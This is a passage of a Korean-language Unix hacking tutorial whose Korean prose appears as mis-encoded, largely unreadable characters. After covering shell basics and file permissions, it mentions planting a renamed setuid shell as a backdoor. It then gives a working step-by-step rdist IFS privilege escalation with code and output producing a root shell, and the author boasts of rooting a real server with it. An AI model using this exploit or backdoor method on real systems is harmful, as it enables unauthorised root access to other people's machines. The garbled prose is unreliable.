ÇØÅ·°ú º¸¾È (¥±)

ÀÌ Àç ¿í : salsari@hotmail.com

 

 

1. ½ÇÀü ÇØÅ·¿¡ µé¾î°¡±â Àü¿¡

    ÀÚ. ÀÌÁ¦ºÎÅÍ´Â ½ÇÀü¿¡ µé¾î°£´Ù. ±× µ¿¾È ÀÎÅͳÝÀ̳ª À¯´Ð½º´Ï ¸Ó¸®°¡ Á¶±Ý ¾ÆÆÍÀ»²«µ¥¡¦.
    ¾ÆÈå~ ±× À̷еéÀÌ ¹ÙÅÁÀÌ µÇ¾î¾ßÁö¸¸ ÀÌ ³»¿ëµéÀ» ÀÌÇØÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù. ½ÇÀü¿¡ µé¾î°¡±â Àü¿¡ ¾Ë¾ÆµÎ¾î¾ß ÇÒ ¿ë¾îµé°ú À¯´Ð½º »ç¿ë¹ý¿¡ ´ëÇØ ¼³¸íÇÒÅÙµ¥.. Àß µû¶ó ¿À½Ã±â¸¦.
    COME COME COME BABY!!

    1.1 À¯´Ð½º ÀÌÇØÇϱâ

    ÇØÅ·Àº ½ÇÀüÀÌ´Ù. ±×·¯¹Ç·Î ³ª´Â ¿©·¯ºÐµéÀÇ ÄÄÇ»ÅÍ¿¡ ¸®´ª½º¸¦ ¼³Ä¡Çϰųª ¿©À¯°¡ ÀÖ´Ù¸é °èÁ¤À» Çϳª ¾ò¾î À¯´Ð½º¿¡ ´ëÇØ °øºÎÇϱ⸦ ÃßõÇÑ´Ù. À̰͵µ Àú°Íµµ ¿©ÀÇÄ¡ ¾Ê´Â´Ù¸é À¯´Ð½º¸¦ ¸¶À½²¯ ¾²¸é¼­ ÇØÅ·À» ¹è¿ï ¼ö ÀÖ´Â °÷À» ¼Ò°³ÇÒ±î ÇÑ´Ù. (À¯°¨½º·´°Ôµµ ¸î¸î ±â´ÉÀº »ç¿ëÇÏÁö ¸øÇÑ´Ù..) - °èÁ¤À» °¡Áö°í Àְųª ¸®´ª½º¸¦ »ç¿ëÇÏ°í ÀÖ´Â ºÐµéµµ ÇÑ ¹ø °¡º¸½Ã¶ó.

    ÇØÄ¿Áî·¦ - ÇØÅ·ÀÚÀ¯Áö´ë
    [
    http://www.hackerslab.org ]

    °ü·Ã »çÇ×µéÀº ÇØÄ¿Áî·¦ ȨÆäÀÌÁö¸¦ ÂüÁ¶Çϼ¼¿ä.

    - ½© (shell)
    ½©Àº Ä¿³Î(Kernel)°ú ¸í·É¾î(Command)»çÀÌ¿¡ ÀÖÀ¸¸ç »ç¿ëÀÚ°¡ ÁöÁ¤ÇÑ ¸í·ÉµéÀ» Çؼ®ÇÏ¿© Ä¿³ÎÀÌ Ã³¸® ÇÒ ¼ö ÀÖµµ·Ï Àü´ÞÇØÁÖ´Â Á߰迪ÇÒÀ» ÇÏ´Â ÀÏÁ¾ÀÇ ¸í·É¾îÀÌ´Ù.

    - ÇÁ·Î¼¼¼­ (process)
    ½ÇÇàµÇ´Â ÇÁ·Î±×·¥°ú ±×¿¡ °ü°èµÇ´Â Á¤º¸¸¦ ¸»ÇÑ´Ù.

    - ·Î±×ÀΠȤ ·Î±ä(Login)
    À¯´Ð½º´Â ¿©·¯»ç¶÷ÀÌ »ç¿ëÇϱ⠶§¹®¿¡ ÀÚ½ÅÀÇ ·Î±×Àθí°ú Æнº¿öµå¸¦ ¾Ë¾Æ¾ßÁö¸¸ Á¢¼ÓÇÏ¿© ±× ÀÚ¿øµéÀ» »ç¿ëÇÒ ¼ö ÀÖ´Ù. - ÄÄÇ»ÅÍ¿ÍÀÇ ½ÇÁúÀûÀÎ ¿¬°á°úÁ¤

    Trying 255.255.255.254...
    Connected to jungmin.org.
    Escape character is ¡®^]¡¯.

    SunOS 5.6

    login: salsari # ·Î±×Àθí - salsari¶ó°í ÀÔ·Â
    Password: # Æнº¿öµå(È­¸é¿¡ ³ªÅ¸³ªÁö ¾Ê´Â´Ù.) - Æнº¿öµå ÀÔ·ÂÇÏÀÚ.
    Last login: Fri Oct 8 19:17:37 from salsari.org # Æнº¿öµå°¡ ¸ÂÀ¸¸é ·Î±×ÀÎ µÇÁö¸Ó..
    Sun Microsystems Inc. SunOS 5.6 Generic August 1997
    You have mail.
    jungmin% # ½©ÀÌ ¶¹´Ù. Á¢¼Ó ¿Ï·á

    - ·Î±×¾Æ¿ô(logout)
    À¯´Ð½º ½Ã½ºÅÛ »ç¿ëÀ» ³¡³»°í ½ÍÀ»¶§, ±× ½Ã½ºÅÛÀ¸·ÎºÎÅÍ ºüÁ®³ª¿À´Â °úÁ¤

    % ^d  # Ctrl+d (¶§·Ð Ctrl + d ¸¦ ¸·¾ÆµÐ ½Ã½ºÅÛµµ ÀÖ´Ù. ±×·² ¶©  logoutÀ» ÀÔ·ÂÇÏÀÚ.)
    Connection closed by foreign host.

    - bash ¿Í csh ÀÇ Â÷ÀÌÁ¡
    ·Î±×Àνà ¡®$¡¯ ȤÀº ¡®%¡¯ ¿Í °°Àº ½©ÀÌ ¶ã°ÍÀε¥ ÀüÀÚ°¡ bash(sh) ÀÌ°í ÈÄÀÚ°¡ csh(tcsh) ÀÌ´Ù. µÑ ´Ù »ç¿ëÀº ºñ½ÁÇÏÁö¸¸ ¾à°£ÀÇ Â÷ÀÌ°¡ Á¸ÀçÇÑ´Ù. °£´ÜÇÏ°Ô Â¤¾îº¸ÀÚ¸é

    path ¼³Á¤¿¡ ´ëÇؼ­...
    bash(sh) : export PATH=¡±.:/bin:/usr/bin¡±
    csh : set path = (. /bin /usr/bin)

    - System V ¿Í BSD À¯´Ð½ºÀÇ Â÷ÀÌÁ¡
    À̵鵵 bash¿Í cshÀÇ Â÷ÀÌó·³ »ç¿ëÇÏ´Â µ¥¿¡´Â Å©°Ô ´Ù¸¥ °ÍµéÀº ¾ø´Ù. ¸í·É¾î ü°è°¡ Ư¡ÀûÀ¸·Î Àú¸¶´Ù Á¶±Ý¾¿ ´Ù¸¦»ÓÀÌ´Ù. ¿ª½Ã °£´ÜÇÏ°Ô Â¤¾îº¸ÀÚ.

    System V

    % ps -ef # % : csh - solaris ¿¡¼­ ½ÇÇà
    UID PID PPID C STIME TTY TIME CMD

     

    BSD

    $ ps -aux # $ : bash - linux ¿¡¼­ ½ÇÇàÇÏ¿´´Ù.
    USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND
    bin 163 0.0 0.6 900 384 ? S Sep 14 0:00 portmap
    news 362 0.0 1.8 1668 1160 ? S Sep 14 0:01 /usr/sbin/innd -p4 -r
    news 377 0.0 0.4 872 280 ? S Sep 14 0:00 /usr/lib/news/bin/ove
    news 403 0.0 0.9 1244 616 ? S Sep 14 18:05 sh /usr/lib/news/bin/
    nobody 20717 0.0 1.0 1180 684 ? S 17:05 0:00 httpd
    ¡¦¡¦

     

    root 0 0 0 8¿ù 05 ? 0:12 sched
    root 1 0 0 8¿ù 05 ? 4:22 /etc/init -
    root 2 0 0 8¿ù 05 ? 0:08 pageout
    root 3 0 1 8¿ù 05 ? 648:44 fsflush
    root 482 1 0 8¿ù 05 ? 0:00 /usr/lib/saf/sac -t 300
    root 401 1 0 8¿ù 05 ? 0:00 /usr/lib/power/powerd
    ¡¦¡¦

    - Æ۹̼Ç(permission)
    È­ÀÏÀÇ Á¢±Ù Çã°¡¸¦ ³ªÅ¸³½ °Í.

    ¿¹¸¦ º¸ÀÚ.

    % ls -l # dosÀÇ dir°ú °°Àº ±â´É
    drwxr-xr-x 2 salsari users 512 10¿ù 8ÀÏ 19:18 .
    drwxr-xr-x 194 root other 3584 10¿ù 4ÀÏ 10:57 ..
    -rwx------ 1 salsari users 0 10¿ù 8ÀÏ 19:27 kkk
    -rw-rw-rw- 1 salsari users 8 10¿ù 8ÀÏ 19:22 kkk1
    -rwxrwxrwx 1 salsari users 29836 10¿ù 8ÀÏ 19:28 salsari.hwp
       

    ¹®ÀÚ   ÀÇ¹Ì           ¸ðµå °ª         ÀǹÌ
    d       µð·ºÅ丮      400             User (owner) Àбâ (r)
    r        Àб⠠          200             User ¾²±â (w)
    w       ¾²±â           100              User ½ÇÇà (x)
    x       ½ÇÇà            040             Group Àбâ
    -       ºÒ°¡´É         020             Group ¾²±â
                              010              Group ½ÇÇà
                              004              Other Àбâ
                              002              Other ¾²±â
                              001              Other ½ÇÇà

     

    ¹®ÀÚ¿Í ¸ðµå °ªÀ» ¾Ë¾Æ µÎ°í permission ÀÌÇØ ´Ü°è¿¡ µé¾î°¡ÀÚ.

    ¸ðµÎ [-] ÀÇ °¹¼ö´Â 10°³ÀÌ´Ù. (Àß ¸ð¸£°ÚÀ¸¸é ¼¼¾î º¸ÀÚ. ºÐ¸í 10Ä­ÀÏ °ÍÀÌ´Ù. ^^)
    ù Ä­ÀÌ [-] À̸é ÀÏ¹Ý ÆÄÀÏ, [d] ÀÌ¸é µð·ºÅ丮ÀÓÀ» ¾Ë¾ÆµÎÀÚ.
    ´ÙÀ½ 9Ä­Àº ¼¼ Çʵå·Î ³ª´· ¼ö ÀÖ´Ù.
    ---/---/--- : [/]¸¦ ±âÁØÀ¸·Î ù ¹ø° Çʵ尡 user(¼ÒÀ¯ÁÖ), µÎ ¹ø° Çʵ尡 group(±×·ì) ¼¼ ¹ø° Çʵ尡 other(±âŸ »ç¿ëÀÚ)ÀÇ ¸ðµåÀÌ´Ù.
    ±×·³ °¢ ÇʵåÀÇ Ã¹ Ä­ÀÌ Àбâ(Read), µÎ ¹ø° Ä­ÀÌ ¾²±â(Write), ¼¼ ¹ø°°¡ ½ÇÇà(eXecution)ÀÌ´Ù. À§ÀÇ Ç¥·Î µûÁöÀÚ¸é ¸ðµå °ªÀÌ Àбâ(r)´Â 4, ¾²±â(w)´Â 2, ½ÇÇà(x)Àº 1 ÀÌ´Ù.
    ¿ª½Ã³ª ÀÌÇØ°¡ Àß °¡Áö ¾ÊÀ» ²¨¶ó ¹Ï´Â´Ù.. --; È®½ÇÇÑ ¿¹¸¦ º¸ÀÚ.

    user Àбâ + user ¾²±â + user ½ÇÇà + group Àбâ + other ½ÇÇà
    r + w + x + r + x = rwxr----x
    400 + 200 + 100 + 40 + 1 = 741

    ÀÌÁ¦ ¾Ë°ÚÂî?... ²À ±â¾ïÇØ µÎÀÚ. ±×·³ ÇÑ ¹ø Æ۹̼ÇÀ» ÀÐ¾î º¼±î³ª?

    drwxr-xr-x 2 salsari users 512 10¿ù 8ÀÏ 19:18 .
    # ÇöÀç µð·ºÅ丮
    drwxr-xr-x 194 root other 3584 10¿ù 4ÀÏ 10:57 ..
    # ºÎ¸ð µð·ºÅ丮
    ¼ÒÀ¯ÁÖ´Â Àаí, ¾²°í, ½ÇÇàÇÒ ¼ö ÀÖ°í ±×·ì, ±âŸ»ç¿ëÀÚ´Â ÀÐ°í ½ÇÇุ ½Ãų ¼ö ÀÖ´Â µð·ºÅ丮¸¦ ¶æÇÑ´Ù. [.]Àº ÇöÀç µð·ºÅ丮, [..]Àº ºÎ¸ðµð·ºÅ丮¸¦ ³ªÅ¸³½´Ù.(¸ðµå°ª 755)

    -rwx------ 1 salsari users 0 10¿ù 8ÀÏ 19:27 kkk
    ½ÃÀÛÀÌ [-] À̹ǷΠÀÏ¹Ý ÆÄÀÏÀÓÀ» ¾Ë ¼öÀÖ´Ù.

    -/rwx/---/--- À̹ǷΠ¼ÒÀ¯ÁÖ¸¸ Àаí, ¾²°í, ½ÇÇàÇÒ ¼ö ÀÖ´Ù.(¸ðµå°ª 700)

    -rw-rw-rw- 1 salsari users 8 10¿ù 8ÀÏ 19:22 kkk1
    ÀÏ¹Ý ÆÄÀÏ, ¼ÒÀ¯ÁÖ, ±×·ì, ±âŸ »ç¿ëÀÚ ¸ðµÎ ÀÐ°í ¾µ ¼ö ÀÖ´Ù.(¸ðµå°ª 666)

    -rwxr-xr-x 1 salsari users 29836 10¿ù 8ÀÏ 19:28 salsari.hwp
    ÀÏ¹Ý ÆÄÀÏ, ¼ÒÀ¯ÁÖ´Â ÀÐ°í ¾²°í ½ÇÇàÇÒ ¼ö ÀÖ´Ù. ±×·ì, ±âŸ »ç¿ëÀÚ´Â ÀÐ°í ½ÇÇุ ½Ãų ¼ö ÀÖ´Ù.

    -Set user id
    ÆÄÀϵéÀ» »ìÇÇ´Ù º¸¸é ¡®-rws--x--x¡¯ ¿Í °°Àº user ½ÇÇàÀÚ¸®¿¡ s ¶ó°í Ç¥½ÃµÇ¾î ÀÖ´Â °ÍÀ» °£È¤ º¸°Ô µÉ °ÍÀÌ´Ù. ÀÌó·³ user ½ÇÇà ÀÚ¸®¿¡ s°¡ ºÙ¾î ÀÖ´Â °ÍÀ» setuid(set user id)¶ó°í Çؼ­ ÀÌ ÆÄÀÏÀ» ½ÇÇà½ÃÅ°´Â µ¿¾È ±× ÆÄÀÏÀÇ user(¼ÒÀ¯ÀÚ)ÀÇ ±ÇÇÑÀ» °¡Áö°í È°µ¿ÇÑ´Ù´Â ¶æÀÌ´Ù. ±×·³ ÀÌ·± ÆÄÀÏÀÇ Àǹ̴Â?
    ¿ìÈ÷È÷~~~ ´ÙÀ½ ¿¹¸¦ º¸ÀÚ.

    -r-sr-xr-x 3 root root 88620 1999³â 9¿ù 15ÀÏ bash
    ÆÄÀϸíÀÌ bash... ½©ÀÓ¿¡ Ʋ¸²¾øÀ»²¨¾ß. ¼ÒÀ¯ÀÚ´Â root, setuid°¡ ºÙ¾î ÀÖ±¸¸¸... ±×·³ ÀÌ ÆÄÀÏÀ» ½ÇÇà½ÃÅ°¸é ´©±¸³ª rootÀÇ ±ÇÇÑÀ» °¡Áú ¼ö ÀÖ´Ù´Â ¶æÀÌ µÇ´Â±º.. ³Ê¹« ÁÁÁö ¾ÊÀº°¡? Àú ÆÄÀϸ¸ ½ÇÇà½ÃÅ°¸é ¿©·¯ºÐµéÀÌ root°¡ µÈ´Ù´Ï.. ¾öû³­ ½ÅºÐ»ó½ÂÀε¥...
    º¸Åë ÇØÅ·ÈÄ ½©À» /usr/bin °ú °°Àº µð·ºÅ丮¿¡ À̸§À» ¹Ù²ã¼­ º¹»ç½ÃŲÈÄ setuid¸¦ °É¾î¼­ ¹éµµ¾î·Î »ç¿ëÇÑ´Ù.

            ¸ðµå °ª      ÀÇ¹Ì                  ºñ°í
            4000         Set user id
            2000         Set group id
            1000         Sticky bit           °øÀ¯¸ðµå

    Sticky bit¿Í °°Àº °ÍÀº /tmp µð·ºÅ丮¿¡ ¸¹ÀÌ »ç¿ëµÈ´Ù.

    drwxrwxrwt 2 root root 512 11¿ù 8ÀÏ 11:11 temp

    ¿¹¿¡¼­ º¸°Çµ¥ ´©±¸³ª /tmp ¹æ¿¡ ÆÄÀÏÀ̳ª µð·ºÅ丮¸¦ ¸¸µé°í Áö¿ï ¼ö ÀÖÁö¸¸ Á¤ÀÛ Áö¿ï ¼ö ÀÖ´Â °ÍÀº ¼ÒÀ¯ÁÖ°¡ ¿©·¯ºÐµé·Î µÇ¾î ÀÖ´Â ÆÄÀÏ°ú µð·ºÅ丮»ÓÀÌ´Ù. (ÈåÈå.. ¾ÈŸ±õÁö..) Àý´ë·Î ´Ù¸¥ »ç¶÷µéÀÌ ¸¸µç ÆÄÀÏÀ» Áö¿ï¼ø ¾ø´Ù. - ±×·¡¼­ °øÀ¯¸ðµå¶ó³×..

    - ¸®´ÙÀÌ·º¼Ç/ÆÄÀÌÇÁ(|)

    > file : ½ÇÇà °á°ú°¡ file¿¡ µé¾î°£´Ù.
    >> file : ½ÇÇà °á°ú°¡ file¿¡ Ãß°¡µÈ´Ù.
    < file : ÀԷ°ªÀ¸·Î file2 ³»¿ëÀÌ µé¾î°£´Ù.
    << kkk : kkk¹®ÀÚ¿­ÀÌ ³ªÅ¸³ª¸é ÀÔ·ÂÀÌ ÁߴܵȴÙ.

    > ¿©·¯ºÐµéÀÌ Á÷Á¢ ÇغÁ¾ß µÉ »çÇ×
    % cat > kkk # ÀÔ·ÂÀ» ¸¶Ä¥¶§´Â ^D(Ctrl + D)¸¦ ÀÔ·ÂÇÏÀÚ.
    % cat >> kkk
    % cat < kkk

    ÆÄÀÌÇÁ(|)´Â ÀÏÁ¾ÀÇ ÇÊÅÍ ¿ªÈ°À» ÇÑ´Ù.
    file | file1 : fileÀÇ °á°ú°ªÀÌ file1ÀÇ ÀÔ·ÂÀ¸·Î »ç¿ëµÈ´Ù.

    > ½ÇÇàÇغ¸¸é ÁÁÀ» °Í
    % ps -ef | grep root

    > ±âŸ ÀÚ¼¼ÇÑ À¯´Ð½º ¸í·É¾î´Â »ý·«ÇÕ´Ï´Ù.. ^^;
    ( »ý·«ÇÏ´Â ÀÚÀÇ ±Ã»öÇÑ º¯¸í - °øºÎÇϼ¼¿ä! °øºÎ!! (-.- )( -.-) )

    1.2 ÇØÅ·¿¡ ´ëÇؼ­ ¾Ë¾ÆµÎ¾î¾ß ÇÒ ¿ë¾îµé

    bug : ¼Ò½ºÆÄÀϵ鳻ÀÇ Ä¡¸íÀûÀÎ ¹®Á¦Á¡.
    hole : °ø°Ý´ë»óÀÌ µÉ¸¸ÇÑ ¹ö±×³ª ·çƾ
    packet : µ¥ÀÌÅ͵éÀ» Á¶°¢³½ µÚ ±×¿¡ °ü·ÃµÈ °¢Á¾ Á¤º¸¸¦ µ¡ºÙÀÎ µ¥ÀÌÅÍÅë½ÅÀÇ ±âº»´ÜÀ§
    backdoor : µÞ¹®, °³±¸¸Û
    attack : °ø°Ý, ħÀÔ
    local host : ÇöÀç »ç¿ëÇÏ°í Àִ ȣ½ºÆ®
    remote host : ¿ÜºÎ·Î ¶³¾îÁ® Àִ ȣ½ºÆ®
    vulnerability : º¸¾È Ãë¾àÁ¡À» ÀÚ¼¼ÇÏ°Ô º¸¿©ÁÖ´Â º¸°í¼­
    Advisory : ÇØÅ·°¡´ÉÇÑ ¿©·¯ ¹ö±×³ª ·çƾµé¿¡ ´ëÇÑ ¹®Á¦Á¡°ú ÇØ°áÃ¥À» ¾Ë·ÁÁÖ´Â º¸°í¼­
    Exploit : ½Ã½ºÅÛ º¸¾È Ãë¾àÁ¡ ÀÌ¿ë

    1.3 ÇØÅ·ÀÇ Á¾·ù

    ÇØÅ·Àº Å©°Ô ¼¼ °¡Áö ¹æ½ÄÀ¸·Î ³ª´­ ¼ö ÀÖ´Ù.

    - Local attack
    remote attackÀ¸·Î °ø°Ý ½Ã½ºÅÛ¿¡ ÀáÀÔÇÑ Ä§ÀÔÀÚ°¡ rootÀÇ ±ÇÇÑÀ» ¾ò¾î³»±â À§ÇÑ °ø°Ý.
    ½Ã½ºÅÛ ³»ºÎ ÇÁ·Î±×·¥µéÀÇ ¹ö±×³ª ȯ°æ º¯¼öÁ¶ÀÛ, °æÀï¹æ½Ä, °ü¸®ÀÚ¿¡ ÀÇÇÑ ½Ã½ºÅÛÀÇ À߸øµÈ ¼³Á¤µîÀ» ÀÌ¿ëÇÑ´Ù.

    - Remote attack
    ¿ÜºÎ·ÎºÎÅÍ ¶³¾îÁ® ÀÖ´Â »óÅ¿¡¼­ °ø°ÝÈ£½ºÆ®ÀÇ DaemonÀÌ °¡Áö°í ÀÖ´Â ¹ö±×³ª NIS/NFSµî ÀÇ À߸øµÈ ¼³Á¤, À¯Àúµé¿¡ °üÇÑ Á¤º¸µéÀ» °¡Áö°í °ø°ÝÇÏ´Â ¹æ½ÄÀ¸·Î ¿ÜºÎÀÇ Ä§ÀÔÀÚ°¡ ¸ñÇ¥ ½Ã½ºÅÛÀÇ shellÀ» ¾ò¾î³»´Â °ÍÀ» ±âº»Àû ¸ñÀûÀ¸·Î ÇÑ´Ù.

    - DOS(Denial of Service)
    ¼­ºñ½º °ÅºÎ °ø°Ý. µÚ¿¡ ÀÚ¼¼ÇÏ°Ô ³ª¿Â´Ù.

     

2. Local attack

    À½.. ¾î¶² °ÍµéºÎÅÍ »ìÆ캼±î? °ú°Å SunOs¸¦ È­·ÁÇÏ°Ô ¼ö ³õ¾Ò´ø rdist¸¦ »ìÆ캼±î³ª?
    8lgm¿¡¼­ ³»³õ¾Ò´ø rdist ¹ö±×¿¡ ´ëÇÑ advisory¸¦ ÂüÁ¶Çϸ鼭 ÇÑ ¹ø »ìÆ캸ÀÚ
    > Àá±ñ! ±×Àü¿¡
    ±×·³ rdist ÇØÅ·¿ø¸®´Â °ú¿¬ ¹«¾ùÀϱî? (¾î¶² ÇØÅ·ÀÌµç ¿ø¸®°¡ Á¸ÀçÇÔÀ» ±â¾ïÇ϶ó.) ±×°Ç ¹Ù·Î IFS ȯ°æº¯¼ö¸¦ Á¶ÀÛÇؼ­ root shellÀ» ¾ò¾î³»´Â °ÍÀÌ´Ù. ±×·³..

    - IFS¶õ ¹«¾ùÀΰ¡?
    IFS´Â Internal Field SeparatorÀÇ ¾àÀÚ·Î ¿ÜºÎÇÁ·Î±×·¥À» ½ÇÇàÇÒ ¶§ ÀԷµǴ ¹®ÀÚ¿­À» ³ª´­ ¶§ ±âÁØÀÌ µÇ´Â ¹®ÀÚ¸¦ Á¤ÀÇÇÏ´Â º¯¼öÀÌ´Ù.
    ±âº»ÀûÀ¸·Î IFS´Â °ø¶õ(Space)À¸·Î Á¤Àǵȴ٠- IFS=¡± ¡°
    ÀÌ IFS¸¦ ½½·¯½¬[/]·Î ¹Ù²Ù°í ½Í´Ù¸é cshÀÎ °æ¿ì¿¡´Â setenv IFS / ,bashÀÎ °æ¿ì¿¡´Â export IFS=¡±/¡± ·Î ÇÏ¸é º¯°æµÈ´Ù. ÀÌÇظ¦ À§Çؼ­ °£´ÜÇÑ ¿¹¸¦ º¸ÀÚ.

    $ cat > pwd1 # pwd1 ÆÄÀÏÀ» »ý¼º
    #!/bin/sh # ½© ½ºÅ©¸³Æ® Á¤ÀÇ. bash(sh)¸¦ »ç¿ëÇÑ´Ù.
    IFS=¡±/¡± # IFS¸¦ [/]·Î Á¤ÀÇ
    export ¡®pwd¡¯ # pwd °á°ú ³»¿ëÀ» º¸¿©ÁØ´Ù.
    ^D  # ÀԷ¸¶Ä¡°í ÀúÀå

    $ pwd  # ÇöÀç µð·ºÅ丮¸¦ Àý´ë °æ·Î·Î º¸¿©ÁØ´Ù.
    /var/tmp
    $ chmod 700 pwd1 # permissionÀ» ½ÇÇà°¡´É Çϵµ·Ï ¸¸µç´Ù.
    $ pwd1 # ¿ì¸®°¡ ¸¸µç ½© ½ºÅ©¸³Æ® ½ÇÇà
    var tmp # IFS¸¦ [/]·Î ¼³Á¤Ç߱⠶§¹®¿¡ var, tmp µÎ °³ÀÇ Çʵå·Î ³ª´µ¾î Áö°Ô µÇ´Â °ÍÀÌ´Ù.

    IFS°¡ ÀÔ·ÂµÈ ´Ü¾îµéÀÇ separator·Î ÀÛ¿ëÇÏ¿© home, fox, ...µîÀÌ ÇϳªÀÇ ´Ü¾î·Î Àνĵǰí ÀÖ´Ù. ±×·³ ´ÙÀ½ ¿¹Á¦¸¦ »ìÆ캸ÀÚ. ¿©±â¿¡¼­ rdistÀÇ º¸¾È»ó ÇêÁ¡À» ¾Ë¾Æº¼ ¼ö ÀÖ´Ù.

    % cat > distex
    #!/bin/sh
    IFS=¡±/¡±
    export PATH
    /bin/sh
    ^D

    % ./distex
    distex: bin: not found # binÀ̶ó´Â ½ÇÇàÆÄÀÏÀÌ ¾ø´Ù´Â ¸Þ½ÃÁö¸¦ º¸¿©ÁÖ°í ÀÖ´Ù.
    bin

    ÀÚ, ÀÌÁ¦ Â÷±ÙÂ÷±Ù ÇÑ ¹ø »ìÆ캸ÀÚ.

    [8lgm]-Advisory-1.UNIX.rdist.23-Apr-1991 # 1991³â... ¿ª½Ã °íÀüÀ̶ó ÇÒ ¸¸ÇÏ´Ù. ±×Ä¡?

    rdist(1) uses popen(3) to execute sendmail(8) as root.
    It can therefore be made to execute arbitary programs as root.
    # rdist ÇÁ·Î±×·¥Àº ÆÄÀÏÀ» ´Ù¸¥ ½Ã½ºÅÛÀ¸·Î ºÐ»ê½Ãų¶§ »ç¿ëµÈ´Ù
    # rdist´Â ȯ°æ º¯¼öÀÎ IFS°¡ ¡®/¡¯·Î Á¤ÀǵǾî ÀÖ´Ù.
    # rdist´Â ½ÇÇ൵Áß¿¡ popen(3)À» ÀÌ¿ëÇÏ¿© /usr/lib/sendmailÀ» ½ÇÇà½ÃŲ´Ù.
    # IFS´Â exec()³ª popen()°°Àº ÇÔ¼ö¸¦ ÀÌ¿ëÇÑ´Ù.

    Any user with access to rdist(1) can become root.
    # rdist¸¦ ÀÌ¿ëÇؼ­ ¾î¶²À¯Àúµç root°¡ µÉ ¼ö Àִٴ±º..

    # distfile À» ¸¸µé¾î ´ÙÀ½ ³»¿ëÀ» ´ãÀÚ.
    HOSTS = localhost
    FILES = BullInTheHeather
    ${FILES} -> ${HOSTS}
    install /tmp/1 ;
    notify user ;

    # usr.c ÆÄÀÏÀ» ¸¸µé¾î ´ÙÀ½ ³»¿ëÀ» ´ãÀÚ.
    main()
    {
    setuid(0);
    chown(¡°sh¡±, 0, 0);
    chmod(¡°sh¡±, 04755);
    exit(0);
    }

    # ¿©±â¼­ºÎÅÍ´Â ½ÇÇà ¸ðµåÀÌ´Ù.

    > % cp /bin/sh . # /bin/sh¸¦ ÇöÀç µð·ºÅ丮(.)¿¡ copy
    > % cc -o usr usr.c # usr.c ÆÄÀÏÀ» ÄÄÆÄÀÏ ÇÏÀÚ.
    > % set path=(. $path) # path - ÇöÀçµð·ºÅ丮¸¦ ÃÖ¿ì¼± °æ·Î·Î ÇÏÀÚ.
    > % setenv IFS / # c shellÀÌ´Ù. IFS¸¦ / ·Î ¼³Á¤ÇÑ´Ù.
    > % rdist # rdist¸¦ ½ÇÇàÇÏÀÚ.
    updating host localhost
    rdist: BullInTheHeather: No such file or directory
    notify @localhost ( user )
    > % ls -l
    -rwsr-xr-x 1 root 106496 Mar 4 00:25 sh
    # ¿Í¿ì~ root shellÀÌ ÇöÀç µð·ºÅ丮¿¡ »ý¼ºµÇ¾ú´Ù. ÇØÅ·¼º°ø!! ·çÆ® ȹµæ ¼º°ø!!
    > % ./sh # ½©À» ½ÇÇà½ÃÅ°ÀÚ.

    # (root shell) # ·çÆ®±ÇÇÑ È¹µæ

    ÀÚ.. »ÑµíÇÑ°¡? ÀÌ ¹ö±×°¡ ¾ÆÁ÷ ÅëÇÏ´Â À¯´Ð½º ¼­¹öµéÀÌ ÀÖÀ»°ÍÀÌ´Ù. SunOS 4.1.2 ÀÌÀü ¹öÀüÀ» ¾²´Â °÷¿¡¼­ ÆÐÄ¡¸¦ ÇÏÁö ¾Ê¾Ò´Ù¸é ÀÌ ¹ö±×°¡ ¼º°øÇÒ °ÍÀÌ´Ù. - ÀÛ³âÀΰ¡? ³»°¡ ÀÌ ¹ö±×·Î ·çÆ®¸¦ ȹµæÇÑ ¼­¹ö°¡ ÀÖ¾ú´Âµ¥... Áö±ÝÀº ¾î´À ¼­¹øÁö ±â¾ïÀÌ °¡¹°°¡¹°ÇÏ´Ù.. (ºÒ°ú ÀÛ³âÀ̶ó±¸! ÇѽÉÇÑ °ü¸®ÀÚ¶ó¸é ÃæºÐÈ÷ ¸ÔÇôµç´Ù. ³ÄÇÏÇÏ~)

    ÀÌ°°ÀÌ È¯°æ º¯¼ö(Environment Variable)¸¦ Á¶ÀÛÇÏ¿© ·çÆ®¸¦ ¾òÀ» ¼ö ÀÖÀ»»Ó¸¸ ¾Æ´Ï¶ó °æÀï Á¶°Ç(Race Condition)À» ÀÌ¿ëÇÒ ¼öµµ ÀÖ°í ½Ã½ºÅÛ °ü¸®ÀÚÀÇ ½Ç¼ö³ª À߸øµÈ ¼³Á¤À¸·Î º¸¾È¿¡ ±¸¸ÛÀÌ »ý±â´Â °æ¿ìµµ ÀÖ´Ù. ÀÌ °°Àº °æ¿ì´Â °ü¸®ÀÚµµ ¸ð¸£´Ï(ÀßÇß´Ù°í ¹Ï°í ÀÖÀ»°Ô »·ÇÏ´Ï..) ´õ Å« ¹®Á¦¸¦ ¹ß»ý½Ãų ¼öµµ ÀÖ´Ù. (º¸Åë ¹ö±×°¡ ¹ß»ýµÇ¸é ±×¸¦ ¼öÁ¤ÇÏ´Â ÆÐÄ¡°¡ ³ª¿À±â ¸¶·ÃÀÌ´Ù. ÇÏÁö¸¸ °ü¸®ÀÚÀÇ ½Ç¼ö·Î ±¸¸ÛÀÌ »ý°Ü³µÀ¸´Ï ÆÐÄ¡°°Àº °ÍÀÌ ÀÖÀ»¸® ¸¸¹«ÇÏ´Ù. - °ü¸®ÀÚÀÇ °ü½É°ú ÁÖÀÇ°¡ ÇÊ¿äÇÏ´Ù.)
    ÇöÀç Local attackÀÇ ÃÖ´ë °ø°Ý¹æ¹ýÀÎ ¹öÆÛ ¿À¹öÇ÷οì(Buffer Overflow)µµ ÀÖ´Ù.

    °æÀï Á¶°Ç ¹æ½Ä -
    Àӽà ÆÄÀÏÀ» »ý¼ºÇÏ´Â ÇÁ·Î±×·¥¿¡¼­ ÀÚÁÖ »ç¿ëÇÑ´Ù. Àӽà ÆÄÀÏÀ» ¸¸µé¾î ¾²°í ÀÏÀÌ ³¡³µÀ¸¸é Áö¿ì´Â °úÁ¤¿¡¼­ ¾²±â ¹Ù·Î Á÷Àü °æÀïÁ¶°ÇÀ» ÀÌ¿ëÇÏ¿© ¿øÇÏ´Â ÆÄÀÏ¿¡ ¿øÇÏ´Â ³»¿ëÀ» Áý¾î³Ö´Â ¹æ½ÄÀÌ´Ù.

    ¹öÆÛ ¿À¹öÇ÷οì -
